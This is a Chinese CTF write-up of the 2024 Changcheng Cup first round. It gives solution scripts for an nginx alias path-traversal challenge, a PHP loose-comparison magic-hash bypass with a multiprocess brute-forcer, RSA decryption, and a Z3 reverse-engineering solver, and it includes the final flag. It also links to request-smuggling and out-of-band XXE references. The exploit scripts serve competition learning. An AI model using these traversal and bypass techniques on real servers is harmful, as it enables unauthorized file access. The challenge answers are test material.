2024长城杯初赛第三场WP及部分题目赛后学习

现在我要点名一个黑盒,全是登录框,谜语描述的比赛。

image.png

WEB

nginxfile

https://www.cnblogs.com/zpchcbd/p/12654984.html

配置错误添加别名:`location /files` 没有以 `/` 结尾而 `alias` 指向的目录有,于是请求 `/files../` 会被拼到别名目录的上一级,从而读到别名目录之外的文件;修复方法是让 `location` 与 `alias` 的结尾斜杠保持一致(或改用 `root`)。
image.png
逆天,根本没见过,我太菜了。
然后就是脚本寻找/var/secret的尽头

import requests
from tqdm import trange

# Probe for the nginx "alias traversal" misconfiguration: when a `location`
# prefix (here /files) has no trailing slash but its `alias` directory does,
# a request for /files../ is mapped to the parent of the aliased directory,
# so the rest of the path escapes the intended root. Server-side fix: give
# `location` and `alias` matching trailing slashes (or use `root` instead).
urla = "http://192.168.16.179:8002/files../var/secret1/secret2/secret3/secret4/secret5/secret6/secret7/secret8/secret9/secret10/secret11/secret12/secret13/secret14/secret15/secret16/secret17/secret18/secret19/secret20/secret21/secret22/secret23/secret24/secret25/secret26/secret27/secret28/secret29/secret30/secret31/secret32/secret33/secret34/secret35/secret36/secret37/secret38/secret39/secret40/secret41/secret42/secret43/secret44/secret45/secret46/secret47/secret48/secret49/secret50/secret51/secret52/secret53/secret54/secret55/secret56/secret57/secret58/secret59/secret60/secret61/secret62/secret63/secret64/secret65/secret66/secret67/secret68/secret69/secret70/secret71/secret72/secret73/secret74/secret75/secret76/secret77/secret78/secret79/secret80/secret81/secret82/secret83/secret84/secret85/secret86/secret87/secret88/secret89/secret90/secret91/secret92/secret93/secret94/secret95/secret96/secret97/secret98/secret99/secret100/secret101/secret102/secret103/secret104/secret105/secret106/secret107/secret108/secret109/secret110/secret111/secret112/secret113/secret114/secret115/secret116/secret117/secret118/secret119/secret120/secret121/secret122/secret123/secret124/secret125/secret126/secret127/secret128/secret129/secret130/secret131/secret132/secret133/secret134/secret135/secret136/secret137/secret138/secret139/secret140/secret141/secret142/secret143/secret144/secret145/secret146/secret147/secret148/secret149/secret150/secret151/secret152/secret153/secret154/secret155/secret156/secret157/secret158/secret159/secret160/secret161/secret162/secret163/secret164/secret165/secret166/secret167/secret168/secret169/secret170/secret171/secret172/secret173/secret174/secret175/secret176/secret177/secret178/secret179/secret180/secret181/secret182/secret183/secret184/secret185/secret186/secret187/secret188/secret189/secret190/secret191/secret192/secret193/secret194/secret195/secret196/secret197/secret198/secret199/secret200/secret201/secret202/secret203/secret204/secret205/secret206/secret207/secret208/secret209/secret210/secret211/secret212/secret213/secret214/secret215/secret216/secret217/secret218/secret219/secret220/secret221/secret222/secret223/secret224/secret225/secret226/secret227/secret228/secret229/secret230/secret231/secret232/secret233/secret234/secret235/secret236/secret237/secret238/secret239/secret240/secret241/secret242/secret243/secret244/secret245/secret246/secret247/secret248/secret249/secret250/secret251/secret252/secret253/secret254/secret255/secret256/secret257/secret258/secret259/secret260/secret261/secret262/secret263/secret264/secret265/secret266/secret267/secret268/secret269/secret270/secret271/secret272/secret273/secret274/secret275/secret276/secret277/secret278/secret279/secret280/secret281/secret282/secret283/secret284/secret285/secret286/secret287/secret288/secret289/secret290/secret291/secret292/secret293/secret294/secret295/secret296/secret297/secret298/secret299/"

# Walk one directory deeper per request until the response body mentions
# "flag". NOTE(review): urla already ends at secret299/, so the first
# iteration appends secret1/ again rather than secret300/ — the loop does
# not continue the numbering from where the literal stops.
for i in trange(1, 700):
    urla += "secret" + str(i) + '/'
    print(urla)
    # NOTE(review): no timeout is set, so a stalled connection blocks the
    # loop indefinitely; the status code is also not checked before the
    # body is inspected.
    res = requests.get(urla)
    if 'flag' in res.text:
        break
    print(res)

到300后返回状态就错误了。
所以目录深度到 300 就是尽头了。

总结

这里其实犯蠢了,直接100、100拼接不就完了,到时候再微调,这样太浪费时间了。
而且前面那个之前也没遇见过。

hash and what (未出)

具体题目忘了,大概类似这个:

<?php
//include 'hint.php';
error_reporting(0);

// Every gate below except the second relies on PHP's loose comparison
// (`!=` / `==`), which compares two numeric-looking strings as numbers.
// A string of the form "0e<digits>" is parsed as 0 * 10^N == 0, so any two
// such strings compare "equal" even though they differ byte-for-byte (the
// "magic hash" issue). The robust form is strict comparison (`===`) or
// hash_equals() on the hash values, plus rejecting non-string input.
if (isset($_GET['a']) && isset($_GET['b']) && isset($_GET['c']) && isset($_GET['d'])) {
    // Gate 1: a and b must differ under loose comparison ...
    if ($_GET['a'] != $_GET['b'] ) {
        echo 1;
        // Gate 2: ... yet their md5() hex digests must be strictly identical.
        if (md5($_GET['a']) === md5($_GET['b'])){
            echo 2;
            // Gate 3: d must loosely equal its own MD4 hex digest.
            if ($_GET['d'] == hash('md4',$_GET['d']) ){
                echo 3;
                // echo $_GET['c'];
                // echo "\n";
                // echo md5(md5($_GET['c']));
                // Gate 4: c must loosely equal md5(md5(c)). The Python script
                // further down brute-forces a "0e<digits>" input whose double
                // MD5 is itself of the "0e<digits>" form.
                if ($_GET['c'] == md5(md5($_GET['c']))){
                    echo 4;
                    // echo $hint;
                }
            }
        }
    }else{
        echo 'Wrong!';
    }
}else{
    // Without all four parameters the source is shown so the checks can be read.
    show_source(__FILE__);
}
?>

前几个都没啥,最后这个c这里卡了很久,脚本一直没出来,爆破的时候一直出问题。
如果单线程这里至少要半个多小时。
这里用cpu多线程重新搞一个脚本。

#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
@Project : Python
@File : 多线程MD5计算
@desc :
@Author : @Natro92
@Date : 2024/4/1 下午2:23
@Blog : https://natro92.fun
@Contact : natro92@natro92.fun
"""
import hashlib
import multiprocessing

from tqdm import tqdm


def is_magic_hash(md5_hash):
    """Return True if *md5_hash* is a PHP "magic hash": ``0e`` followed only by digits.

    PHP's loose ``==`` parses such a string as ``0 * 10**N == 0``, so all of
    them compare equal to each other under numeric comparison.
    """
    prefix, rest = md5_hash[:2], md5_hash[2:]
    if prefix != '0e':
        return False
    return rest.isdigit()


def check_magic_hash(j):
    """Test whether the candidate ``'0e' + str(j)`` survives a double MD5 as a magic hash.

    Args:
        j: integer suffix appended to the ``0e`` prefix.

    Returns:
        ``(candidate, md5(candidate), md5(md5(candidate)))`` when the second
        digest is of the ``0e<digits>`` form, otherwise ``None``.
    """
    candidate = f"0e{j}"
    first = hashlib.md5(candidate.encode('utf-8')).hexdigest()
    second = hashlib.md5(first.encode('utf-8')).hexdigest()
    if not is_magic_hash(second):
        return None
    return candidate, first, second


def worker_init():
    """Per-worker initializer handed to ``multiprocessing.Pool``; deliberately a no-op."""
    return None


def find_magic_hashes(cpus_to_use, start, end):
    """Scan the suffixes ``[start, end)`` for a magic hash using a process pool.

    Args:
        cpus_to_use: number of worker processes.
        start: first suffix (inclusive).
        end: last suffix (exclusive).

    Returns:
        True as soon as one candidate is reported (the scan stops early),
        False when the whole window was exhausted without a hit.
    """
    candidates = range(start, end)
    progress = tqdm(total=end - start)
    hit = False

    with multiprocessing.Pool(cpus_to_use, initializer=worker_init) as pool:
        # Unordered results keep the bar moving as soon as any chunk finishes.
        results = pool.imap_unordered(check_magic_hash, candidates, chunksize=10000)
        for outcome in results:
            progress.update()
            if outcome is None:
                continue
            tqdm.write(f"Found magic hash! {outcome[0]} => {outcome[1]} => {outcome[2]}")
            hit = True
            break

    progress.close()
    return hit


if __name__ == '__main__':
    # Scan the suffix space in fixed-size windows until one window reports a hit.
    window = 10000000
    cpus_to_use = multiprocessing.cpu_count()
    start, end = 0, window

    while True:
        if find_magic_hashes(cpus_to_use, start, end):
            break
        tqdm.write(f"[*] Processed from {start} to {end}")
        start, end = end, end + window

    print("已完成!")

image.png
这里是结果:0e1138100474
这里我的笔记本爆破速度大概是6s/10000000,这里用实验室电脑跑的,3s/10000000,跑出来大概用了5min。
后面听说是一个反序列化,没看到题。

总结

之前的类型基本都直接上网上找就能找到结果、再不济几分钟就能爆破出来,但是这个如果用单线程需要挺久时间。比赛的时候还不会用python的多线程,只会异步,这里学到了。
但是即使如此也改变不了它的题的烂😓。

CRYPTO

NormalRSA

http://www.hiencode.com/pub_asys.html 读取公钥

2062175026715261437251115412763083482865084247140319742062762463
4995641445264611301521536394494222306763722460243604532087804596
3432728830519031374468077063917444848749465641735931200001426223
5594470359998447338296049806048891022382254041324480871431224423
5115271360890728119312050221054304224094425401105613861305013563
5514914058484817318899241087559790939706200854074183590691515211
4453356716063452277874957192087392607913854176530832611484138217
5052307472122163146240196121035096483713942342665052475556933935
3882669182278859893320203427019949490782166083869543333080393630
0604578686078819366973524207408949604343502434711860525904962100
1327230673967595302433625181686605594786528098202718607801030192
4940151039925932146355741745220174035940054038306022026228754431
1370133442080810786279849782886778349636485793830572795447926288
9562215186039812208961157944153847667741946574776559918179497703
0756721895322782152304598423467273338216669283325523339549713431
4463878844587655972981011487725896688961503814722391229828902820
3488466463162267754958689409484898706404559934123043284971567725
0864743824756212644614677498812628671839186669992576236988819357
0077831538329160205902202652064968188663233653297177256124327883
7804579164761873982701072229548260362895897175683450182134223930
2186854370700144885242918872352977360003344941616571112523070870
0603583238413046540341798055437204310139701321689529339705216775
1542665730166593979774386291641308772888852080245934262055011545
6222167216263637510436436727915159622990255542874401237224391491
2014587205781634801565763289779322445409267365171052120922122481
0118747827968189052429492509290693652292202416403871346427335546
648614804149133552945105363241107403

分解

写脚本:

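import gmpy2
from Crypto.Util.number import *

e = 65537
# The ciphertext file holds the raw big-endian bytes of c; read it inside a
# `with` block so the handle is closed even if the conversion fails.
with open(r"D:\CacheForAll\Wechat\WeChat Files\wxid_1n5qjy5wqiq222\FileStorage\File\2024-03\normalrsa\cipher.txt", "rb") as fh:
    c = bytes_to_long(fh.read())
# q: one prime factor recovered in the factoring step above.
# n: the modulus read out of the public key.
q = 108082147276398906822234149167480016132157014049560913761488880190018027488520386318253742675423286348552334110023434741671427911613197684395221211646299519273129194692306445874938199068586137486874290442314459278649345469626426790676801658394799404284116771456479272808343825651929906737811050557836671896732124546721747709022607151231423494815945385193624295868730390462068156825588342737037490320356361648437686599733
n = 20621750267152614372511154127630834828650842471403197420627624634995641445264611301521536394494222306763722460243604532087804596343272883051903137446807706391744484874946564173593120000142622355944703599984473382960498060488910223822540413244808714312244235115271360890728119312050221054304224094425401105613861305013563551491405848481731889924108755979093970620085407418359069151521144533567160634522778749571920873926079138541765308326114841382175052307472122163146240196121035096483713942342665052475556933935388266918227885989332020342701994949078216608386954333308039363006045786860788193669735242074089496043435024347118605259049621001327230673967595302433625181686605594786528098202718607801030192494015103992593214635574174522017403594005403830602202622875443113701334420808107862798497828867783496364857938305727954479262889562215186039812208961157944153847667741946574776559918179497703075672189532278215230459842346727333821666928332552333954971343144638788445876559729810114877258966889615038147223912298289028203488466463162267754958689409484898706404559934123043284971567725086474382475621264461467749881262867183918666999257623698881935700778315383291602059022026520649681886632336532971772561243278837804579164761873982701072229548260362895897175683450182134223930218685437070014488524291887235297736000334494161657111252307087006035832384130465403417980554372043101397013216895293397052167751542665730166593979774386291641308772888852080245934262055011545622216721626363751043643672791515962299025554287440123722439149120145872057816348015657632897793224454092673651710521209221224810118747827968189052429492509290693652292202416403871346427335546648614804149133552945105363241107403
# A mistyped or wrong factor would make the floor division below yield a
# bogus p and an unrelated "plaintext"; fail loudly instead.
if n % q != 0:
    raise ValueError("q does not divide n; check the recovered factor")
p = n // q
phi = (p - 1) * (q - 1)
# Private exponent d = e^-1 mod phi(n).
d = int(gmpy2.invert(e, phi))
m = pow(c, d, n)
print(m)
print(long_to_bytes(m))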

image.png

总结

刚开始看这个的时候犯蠢了,前两天装office全家桶的时候装上了publisher,我以为是misc的隐写进去。实际上是公钥,根本没看这个。

MISC

绝不服输

image.png
upload 执行命令,有个压缩包:
image.png
image.png
hex数据转出得到zip文件夹。
image.png
还有一个图片上面是密码。
解压得到flag。

总结

最开始看到upload追踪流没找到,好久没做misc了,wireshark不会用了😓。

RE

ZE

不是我做的

Z3直接梭

"""
用Z3解出v5的值
v4 = [0x00004F17, 0x00009CF6, 0x00008DDB, 0x00008EA6, 0x00006929, 0x00009911, 0x000040A2, 0x00002F3E, 0x000062B6, 0x00004B82, 0x0000486C, 0x00004002, 0x000052D7, 0x00002DEF, 0x000028DC, 0x0000640D, 0x0000528F, 0x0000613B, 0x00004781, 0x00006B17, 0x00003237, 0x00002A93, 0x0000615F, 0x000050BE, 0x0000598E, 0x00004656, 0x00005B31, 0x0000313A, 0x00003010, 0x000067FE, 0x00004D5F, 0x000058DB, 0x00003799, 0x000060A0, 0x00002750, 0x00003759, 0x00008953, 0x00007122, 0x000081F9, 0x00005524, 0x00008971, 0x00003A1D]
"""
from z3 import *
v5 = [BitVec("v5_%d" % i, 8) for i in range(42)]
v4 = [0x00004F17, 0x00009CF6, 0x00008DDB, 0x00008EA6, 0x00006929, 0x00009911, 0x000040A2, 0x00002F3E, 0x000062B6, 0x00004B82, 0x0000486C, 0x00004002, 0x000052D7, 0x00002DEF, 0x000028DC, 0x0000640D, 0x0000528F, 0x0000613B, 0x00004781, 0x00006B17, 0x00003237, 0x00002A93, 0x0000615F, 0x000050BE, 0x0000598E, 0x00004656, 0x00005B31, 0x0000313A, 0x00003010, 0x000067FE, 0x00004D5F, 0x000058DB, 0x00003799, 0x000060A0, 0x00002750, 0x00003759, 0x00008953, 0x00007122, 0x000081F9, 0x00005524, 0x00008971, 0x00003A1D]
s = Solver()
s.add(v4[0] == 34 * v5[3] + 12 * v5[0] + 53 * v5[1] + 6 * v5[2] + 58 * v5[4] + 36 * v5[5] + v5[6])
s.add(v4[1] == 27 * v5[4] + 73 * v5[3] + 12 * v5[2] + 83 * v5[0] + 85 * v5[1] + 96 * v5[5] + 52 * v5[6])
s.add(v4[2] == 24 * v5[2] + 78 * v5[0] + 53 * v5[1] + 36 * v5[3] + 86 * v5[4] + 25 * v5[5] + 46 * v5[6])
s.add(v4[3] == 78 * v5[1] + 39 * v5[0] + 52 * v5[2] + 9 * v5[3] + 62 * v5[4] + 37 * v5[5] + 84 * v5[6])
s.add(v4[4] == 48 * v5[4] + 14 * v5[2] + 23 * v5[0] + 6 * v5[1] + 74 * v5[3] + 12 * v5[5] + 83 * v5[6])
s.add(v4[5] == 15 * v5[5] + 48 * v5[4] + 92 * v5[2] + 85 * v5[1] + 27 * v5[0] + 42 * v5[3] + 72 * v5[6])
s.add(v4[6] == 26 * v5[5] + 67 * v5[3] + 6 * v5[1] + 4 * v5[0] + 3 * v5[2] + 68 * v5[6])
s.add(v4[7] == 34 * v5[10] + 12 * v5[7] + 53 * v5[8] + 6 * v5[9] + 58 * v5[11] + 36 * v5[12] + v5[13])
s.add(v4[8] == 27 * v5[11] + 73 * v5[10] + 12 * v5[9] + 83 * v5[7] + 85 * v5[8] + 96 * v5[12] + 52 * v5[13])
s.add(v4[9] == 24 * v5[9] + 78 * v5[7] + 53 * v5[8] + 36 * v5[10] + 86 * v5[11] + 25 * v5[12] + 46 * v5[13])
s.add(v4[10] == 78 * v5[8] + 39 * v5[7] + 52 * v5[9] + 9 * v5[10] + 62 * v5[11] + 37 * v5[12] + 84 * v5[13])
s.add(v4[11] == 48 * v5[11] + 14 * v5[9] + 23 * v5[7] + 6 * v5[8] + 74 * v5[10] + 12 * v5[12] + 83 * v5[13])
s.add(v4[12] == 15 * v5[12] + 48 * v5[11] + 92 * v5[9] + 85 * v5[8] + 27 * v5[7] + 42 * v5[10] + 72 * v5[13])
s.add(v4[13] == 26 * v5[12] + 67 * v5[10] + 6 * v5[8] + 4 * v5[7] + 3 * v5[9] + 68 * v5[13])
s.add(v4[14] == 34 * v5[17] + 12 * v5[14] + 53 * v5[15] + 6 * v5[16] + 58 * v5[18] + 36 * v5[19] + v5[20])
s.add(v4[15] == 27 * v5[18] + 73 * v5[17] + 12 * v5[16] + 83 * v5[14] + 85 * v5[15] + 96 * v5[19] + 52 * v5[20])
s.add(v4[16] == 24 * v5[16] + 78 * v5[14] + 53 * v5[15] + 36 * v5[17] + 86 * v5[18] + 25 * v5[19] + 46 * v5[20])
s.add(v4[17] == 78 * v5[15] + 39 * v5[14] + 52 * v5[16] + 9 * v5[17] + 62 * v5[18] + 37 * v5[19] + 84 * v5[20])
s.add(v4[18] == 48 * v5[18] + 14 * v5[16] + 23 * v5[14] + 6 * v5[15] + 74 * v5[17] + 12 * v5[19] + 83 * v5[20])
s.add(v4[19] == 15 * v5[19] + 48 * v5[18] + 92 * v5[16] + 85 * v5[15] + 27 * v5[14] + 42 * v5[17] + 72 * v5[20])
s.add(v4[20] == 26 * v5[19] + 67 * v5[17] + 6 * v5[15] + 4 * v5[14] + 3 * v5[16] + 68 * v5[20])
s.add(v4[21] == 34 * v5[24] + 12 * v5[21] + 53 * v5[22] + 6 * v5[23] + 58 * v5[25] + 36 * v5[26] + v5[27])
s.add(v4[22] == 27 * v5[25] + 73 * v5[24] + 12 * v5[23] + 83 * v5[21] + 85 * v5[22] + 96 * v5[26] + 52 * v5[27])
s.add(v4[23] == 24 * v5[23] + 78 * v5[21] + 53 * v5[22] + 36 * v5[24] + 86 * v5[25] + 25 * v5[26] + 46 * v5[27])
s.add(v4[24] == 78 * v5[22] + 39 * v5[21] + 52 * v5[23] + 9 * v5[24] + 62 * v5[25] + 37 * v5[26] + 84 * v5[27])
s.add(v4[25] == 48 * v5[25] + 14 * v5[23] + 23 * v5[21] + 6 * v5[22] + 74 * v5[24] + 12 * v5[26] + 83 * v5[27])
s.add(v4[26] == 15 * v5[26] + 48 * v5[25] + 92 * v5[23] + 85 * v5[22] + 27 * v5[21] + 42 * v5[24] + 72 * v5[27])
s.add(v4[27] == 26 * v5[26] + 67 * v5[24] + 6 * v5[22] + 4 * v5[21] + 3 * v5[23] + 68 * v5[27])
s.add(v4[28] == 34 * v5[31] + 12 * v5[28] + 53 * v5[29] + 6 * v5[30] + 58 * v5[32] + 36 * v5[33] + v5[34])
s.add(v4[29] == 27 * v5[32] + 73 * v5[31] + 12 * v5[30] + 83 * v5[28] + 85 * v5[29] + 96 * v5[33] + 52 * v5[34])
s.add(v4[30] == 24 * v5[30] + 78 * v5[28] + 53 * v5[29] + 36 * v5[31] + 86 * v5[32] + 25 * v5[33] + 46 * v5[34])
s.add(v4[31] == 78 * v5[29] + 39 * v5[28] + 52 * v5[30] + 9 * v5[31] + 62 * v5[32] + 37 * v5[33] + 84 * v5[34])
s.add(v4[32] == 48 * v5[32] + 14 * v5[30] + 23 * v5[28] + 6 * v5[29] + 74 * v5[31] + 12 * v5[33] + 83 * v5[34])
s.add(v4[33] == 15 * v5[33] + 48 * v5[32] + 92 * v5[30] + 85 * v5[29] + 27 * v5[28] + 42 * v5[31] + 72 * v5[34])
s.add(v4[34] == 26 * v5[33] + 67 * v5[31] + 6 * v5[29] + 4 * v5[28] + 3 * v5[30] + 68 * v5[34])
s.add(v4[35] == 34 * v5[38] + 12 * v5[35] + 53 * v5[36] + 6 * v5[37] + 58 * v5[39] + 36 * v5[40] + v5[41])
s.add(v4[36] == 27 * v5[39] + 73 * v5[38] + 12 * v5[37] + 83 * v5[35] + 85 * v5[36] + 96 * v5[40] + 52 * v5[41])
s.add(v4[37] == 24 * v5[37] + 78 * v5[35] + 53 * v5[36] + 36 * v5[38] + 86 * v5[39] + 25 * v5[40] + 46 * v5[41])
s.add(v4[38] == 78 * v5[36] + 39 * v5[35] + 52 * v5[37] + 9 * v5[38] + 62 * v5[39] + 37 * v5[40] + 84 * v5[41])
s.add(v4[39] == 48 * v5[39] + 14 * v5[37] + 23 * v5[35] + 6 * v5[36] + 74 * v5[38] + 12 * v5[40] + 83 * v5[41])
s.add(v4[40] == 15 * v5[40] + 48 * v5[39] + 92 * v5[37] + 85 * v5[36] + 27 * v5[35] + 42 * v5[38] + 72 * v5[41])
s.add(v4[41] == 26 * v5[40] + 67 * v5[38] + 6 * v5[36] + 4 * v5[35] + 3 * v5[37] + 68 * v5[41])

assert s.check() == sat
m = s.model()
print("".join([chr(m[v5[i]].as_long()) for i in range(42)]))

flag{7e171d43-63b9-4e18-990e-6e14c2afe648}

最后

WEB除了那俩我记得还有一个AdminLTE,弱口令登录进去,然后估计是找某个后台cve。
还有一个是gunicorn请求走私漏洞。这个因为Yakit没法切换显示\r\n,所以没做,等有时间再搞一下。

https://zhuanlan.zhihu.com/p/643981358 http请求走私
https://github.com/anshumanpattnaik/http-request-smuggling 请求走私工具
https://blog.csdn.net/xiru9972/article/details/128342729 gunicorn走私漏洞

phpinfo那个不知道是什么,我以为是pearcmd,但是没有文件上传入口。还有一个签到XXE,没回显,常规读文件也不行,看看过段时间能不能找个wp看看。

http://www.nanhack.com/payload/xxe/xxe2.php xxe外带
https://www.cnblogs.com/17bdw/p/10098181.html#_label1 xxe

说实话,打之前看了第一二场的难度,比这简单多了。没合计第二天突然升难度了,队内pwn手也差一点出一个,要不然应该稳了的。第四第五场之后难度又下去了😓。
群u说是原题,但是我怎么一个没找到。这段时间比赛比较多,重心要转回CTF了。😵